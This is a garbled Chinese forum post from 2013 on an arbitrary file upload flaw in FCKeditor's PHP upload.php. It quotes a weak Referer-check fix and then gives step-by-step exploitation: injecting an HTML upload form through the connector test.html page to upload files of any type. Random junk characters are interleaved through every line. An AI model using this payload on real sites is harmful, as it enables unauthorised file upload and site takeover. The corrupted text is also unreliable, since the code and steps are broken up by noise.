漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
. K0 S* D0 B" m3 p9 t2 k0 X网上给出的修复方案是3 d7 x* ~2 l0 h) v( o
修复方法,删除FCK编辑器用其他的编辑器, T0 [& ]& i0 T1 O* u9 I) g
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
* I6 G* D/ v7 F# i- K在
& x# l' }' `& {. i, crequire(‘config.php’);; @' a$ v6 \/ X4 a' R2 P: K
require(‘util.php’);& {# |- |( `! I9 o% f. F
的下面添加以下代码—————————–. p+ p, D: x6 l* Y1 a# B9 J' k
//防止外部提交
, H% Q# ?7 U3 I+ B: Z) |! Qfunction outsidepost()9 a, P$ G8 B' x0 v! p
{
7 Y7 T2 ?* V3 g& v/ v; e- w! [5 t5 s. _: [$servername=$_SERVER['SERVER_NAME'];
4 D- S* o/ `3 I2 B- H, h1 A/ U1 b$sub_from=@$_SERVER['HTTP_REFERER'];" T: [! N$ P. m/ ]9 R: ]) @' f2 D+ g
$sub_len=strlen($servername);. j& N1 q2 x6 c( w3 H
$checkfrom=substr($sub_from,7,$sub_len);) d* m( c+ S: x% ~
if($checkfrom!=$servername){ a! i. F2 p% y% L% m d+ [2 C# ?
echo(“you don’t outsidepost!”);
" l q+ S0 w" h) N# s! |! Texit;5 g9 A" K# H7 O
}& t6 H8 e9 h* f, ]9 z
} R& h! ?) m, C% O1 l
outsidepost();) W# v& z) @% N u: C' b
防止外部提交,但是没有防止内部提交,: t+ H& `! Y2 k# O' t' M
利用方法:
! c+ f& }$ `: z' h7 e m2 m- I, M+ @1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html# q% f2 {3 U" A5 T$ Y) X6 C
2,在Current Folder 框输入
4 m9 x- b; E# R<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
- D2 v( |. y( |: X# d' O4 s$ ~2 b9 L然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。; [# A3 d* z2 S+ s0 l( F& y4 V. l
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对